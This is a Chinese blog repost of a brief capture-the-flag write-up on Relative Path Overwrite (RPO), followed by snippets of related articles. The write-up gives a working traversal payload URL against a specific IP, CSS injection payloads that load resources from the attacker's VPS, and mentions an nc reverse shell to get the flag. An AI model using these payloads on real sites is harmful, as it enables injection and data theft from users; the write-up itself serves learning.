pwnhub 相对路径覆盖

最新推荐文章于 2022-09-26 14:42:25 发布
最新推荐文章于 2022-09-26 14:42:25 发布
阅读量123 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/wangshuwin/p/6629037.html
版权

这个pwnhub小m师傅的题,做的时候完全没有思路。

首先是注册然后可以看到一个加载css的地方,是相对路径加载(当然我并没有觉得有什么问题)。

服务端和浏览器解析URL是有区别的,就是%2f

服务器吧%2f解析成/ 比如:http://domain/1%2f2.php,我们访问这个,服务器会解析成http://domain/1/2.php,而浏览器会把1%2f2.php当成一个文件

知道这点过后我们来看看payload:http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php

服务器把%2f当成/所以就变成了http://52.80.19.55/user.php/510/a/b/../../../../classes.php网上跳4级目录就是/classes.php

而浏览器把这个..%2f..%2f..%2f..%2fclasses.php当成一个目录,在加载这个目录下面的css的时候就变成了http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php../../classes.css网上跳两级目录就成了在user.php下面加载css而这个css里面的<p>写入了页面就是用户注册时提交的viow

,提交时提交自己的vps:*{}*{background-image:url('http://vpsip');}*{}或者{}import url('http://vpsip')

然后通过bugreporter 提交payload nc反弹就可以得到flag;

第一次遇到这个东西所以想记录下来

转载于:https://www.cnblogs.com/wangshuwin/p/6629037.html

aihuochou9723
关注
java 获取tomcat的相对路径_tomcat获取相对路径和绝对路径总结
weixin_31530761的博客
02-16 2732
Java代码Stringpath=Struts2Util.getServletContext().getRealPath("/");Jsp代码Stringpath=request.getContextPath();StringbasePath=request.getScheme()+"://"+request.getServerName()+":"+request.g...
路径覆盖用例:全路径 vs. 线性无关路径
最新发布
ZigZag_Garden的博客
03-06 2043
当全路径覆盖由于“路径爆炸”无法实现时,通过线性无关路径覆盖,可以以极少的用例,实现语句和判定覆盖。线性无关路径覆盖是一种很好的准则。
RPO 相对路径覆盖攻击
hl1293348082的专栏
05-31 2132
RPO (Relative Path Overwrite) 相对路径覆盖,最早由 Gareth Heyes 在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过引入相对路径来引入其他资源文件,以达到我们的目的。 漏洞成因: RPO 依赖于浏览器和网络服务器的反应,基于服务器的 Web 缓存技术和配置差异,以及服务器和客户端游览器的解析差异,利用前端代码中加载的 css/js 的相对路径来加载其他文件,最终浏览器将服务器返回的不是 css/js 文件
【RPO技巧拓展】————3、IIS和.Net应用程序中的非根相对路径覆盖(RPO)
Fly_鹏程万里
01-31 2602
在这篇博文中,我将向您展示一种更好的方法来利用ASP.NET Web窗体应用程序中的非根相对路径覆盖问题。这是一个低风险漏洞,可用于将资源(如样式表)甚至动态JavaScript注入受影响的网页。 介绍 很长一段时间以来,我们很多人都知道路径信息以及.Net,php或java等几种Web应用技术的能力,这些技术可以通过使用斜杠(“/”)或半波段在文件扩展名后接受参数-colon(“;”)字符。...
相对路径覆盖漏洞攻击RPO详解
Cwillchris的博客
09-26 4153
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。
RPO漏洞分析与利用
vspiders的博客
04-04 2869
RPO,全称(Relative Path Overwirte)相对路径覆盖,它主要利用浏览器的一些特性与服务器的配置差异导致的。通俗来说就是浏览器与服务器两者对请求的解析不一致,并没有做到同步解析。因而我们可以通过相对路径来引入其他的资源文件,以至于达到我们的目的。这里以www.xxx.com/test为例。第一步:比如我们输入一个请求http://www.xxx.com/test/%2f..%2...
HTML相对路径解析(Relative Path)
iCopper_的博客
06-21 1793
原文:https://blog.csdn.net/l18848956739/article/details/53411241
ROS 扫地机器人路径覆盖及控制源码
07-22
基于turtlesim小乌龟实现的ROS 扫地机器人路径覆盖算法,及差速控制。 使用方法: 1、下载源码 cd catkin_ws/src catkin_create_pkg turtlesim_cleaner cd catkin_ws catkin_make 2、运行 roscore //ROS Master ...
Linux入门之ln命令创建软链接的绝对路径和相对路径详解(Ubuntu)
01-09
ln -s 源文件路径 软链接文件路径 参数 功能 -b 删除,覆盖以前建立的链接 -d 允许超级用户制作目录的硬链接 -f 强制执行 -i 交互模式,文件存在则提示用户是否覆盖 -n 把符号链接视为一般目录 -s ...
java连接sqlite数据库 相对路径怎么写_配置sqlite的相对路径
weixin_34055346的博客
03-02 3359
一般在使用sqlite的时候都是配置url为绝对路径,但是今天在测试代码的时候想到如果将项目不到tomcat上之后,db文件总不能一直配置成绝对路径,肯定是项目中的某个位置,因此对jdbc配置文件进行了修改:jdbc.url=jdbc:sqlite:blog.dbdb文件放在WEB-INF/classes下,运行后发现貌似没有问题,然而事实并不是这样QAQ因为测试中初始化代码会自动根据bean创建...
绝对路径/相对路径(div)
桑海田
10-06 1049
掌柜的上代码:div.html<!doctype html> <html> <head> <meta charset="gb2312"> <title>div文档</title> <link rel="stylesheet" href="style.css" type="text/css"> </head><body> <h2 class="pos_abs">这是带有绝对路径的标题</h2> <di
Pwnhub之目瞪狗呆
dengzhasong7076的博客
04-02 336
注入很明显,更多的是考技巧。 <?php require 'conn.php'; $id = $_GET['id']; if (preg_match("/(sleep|benchmark|outfile|dumpfile|load_file|join)/i", $_GET['id'])) { die("you bad bad!"); } $sql = "select * f...
强网杯—share your mind了解RPO+XSS+CSRF
csu_vc的博客
03-27 2274
RPO(Relative Path Overwrite) 1.What is RPO RPO(相对路径覆盖)是一种通过覆盖目标文件来利用相对URL的技术。要了解这项技术,我们必须首先研究相对网址和绝对网址之间的差异。绝对URL基本上是包含协议和域名的目标地址的完整URL,而相对URL则是不指定域或协议,并使用现有目的地来确定协议和域。 Absolute URL https://gr...
(软件测试)代码覆盖(语句覆盖,分支覆盖,条件覆盖,条件组合覆盖,路径覆盖
热门推荐
Shiny0815的博客
05-03 4万+
一、概念语句覆盖/代码行覆盖:目标☞保证程序中每一条语句最少执行一次,其覆盖标准无法发现判定中逻辑运算的错误;判定覆盖/分支覆盖:是指选择足够的测试用例,使得运行这些测试用例时,每个判定的所有可能结果至少出现一次,                                 但若程序中的判定是有几个条   件联合构成时,它未必能发现每个条件的错误;条件覆盖:是指选择足够的测试用例,使得运行这些...
分享一下修复项目漏洞步骤
IT_master8888的博客
02-06 3291
项目漏洞修复步骤: Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞 <shiro.version>1.6.0</shiro.version> 检测到目标站点存在javascript框架库漏洞 jquery-3.5.1.js 检测到目标主机可能存在缓慢的HTTP拒绝服务攻击 设置Tomcat / server.xml文件 connectiontimeout 值,默认为20000ms,修改为8000ms(Tomcat 自身安全漏洞) A...
C#获取操作系统相对路径的方法
"这篇文章主要介绍了在C#编程中获取各种类型的相对路径的方法,包括当前进程、当前目录、应用程序域和环境变量等相关知识。" 在C#编程中,获取相对路径是常见的需求,尤其是在处理文件系统操作时。以下是一些常用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值